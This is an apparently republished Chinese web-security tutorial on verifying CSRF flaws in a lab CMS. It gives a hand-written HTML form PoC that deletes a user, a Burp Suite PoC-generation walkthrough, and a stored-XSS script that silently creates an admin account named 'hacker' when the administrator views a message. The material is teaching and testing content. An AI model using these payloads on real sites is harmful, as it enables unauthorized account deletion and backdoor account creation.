4.2验证CSRF漏洞

Posted 白帽子养成记

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了4.2验证CSRF漏洞相关的知识,希望对你有一定的参考价值。

手工检测

前提

  • CSRF只能通过用户的正规操作进行攻击,实际上就是劫持用户操作。

  • 在检测前首先需要确定Web应用程序的所有功能

  • 以及确定哪些操作是敏感的

  • 比如修改密码、转账、发表留言等功能

第一步 抓取删除用户的数据包

第二步 编写CSRF POC

<html>  
<body>
<script>history.pushState('', '', '/')</script>
  <form action="http://192.168.146.148/cms/admin/user.action.php" method="POST">
    <input type="hidden" name="act" value="delete" />
    <input type="hidden" name="userid" value="31" />
    <input type="submit" value="Submit request" />
  </form>
</body>
</html>

第三步 提交poc查看

4.2验证CSRF漏洞

半自动检测

借助工具burpsuit

第一步 在管理员处添加用户

4.2验证CSRF漏洞

第二步 抓取数据包

4.2验证CSRF漏洞

第三步 右击--->Engagemet tools---> Generate CSRF PoC

4.2验证CSRF漏洞

第四步 保存poc,并访问

4.2验证CSRF漏洞

第五步  查看添加用户信息

4.2验证CSRF漏洞

xss+CSRF结合使用

第一步 在留言板处,将poc写入留言板内容

<script>
xmlhttp = new XMLHttpRequest();
xmlhttp.open(\'post\',\'http://192.168.232.129/cms/admin/user.action.php\',false);
xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");
xmlhttp.send(\'act=add&username=hacker&password=123456&password2=123456&button=%E6%B7%BB%E5%8A%A0%E7%94%A8%E6%88%B7&userid=0\');
</script>

4.2验证CSRF漏洞

第二步 管理登录后台,查看留言

4.2验证CSRF漏洞


第三步 查看是否添加用户

摘抄


生活,

一半诗意一半烟火;

人生,

一半努力一半随缘;

努力做一个清醒、自律、坦荡的人。



以上是关于4.2验证CSRF漏洞的主要内容,如果未能解决你的问题,请参考以下文章

从漏洞复现到代码审计,深入学习csrf漏洞原理

[转]CSRF漏洞详细说明

[转]CSRF漏洞详细说明

CSRF(跨站请求伪造攻击)漏洞详解

入坑小白的CSRF漏洞验证

CSRF漏洞笔记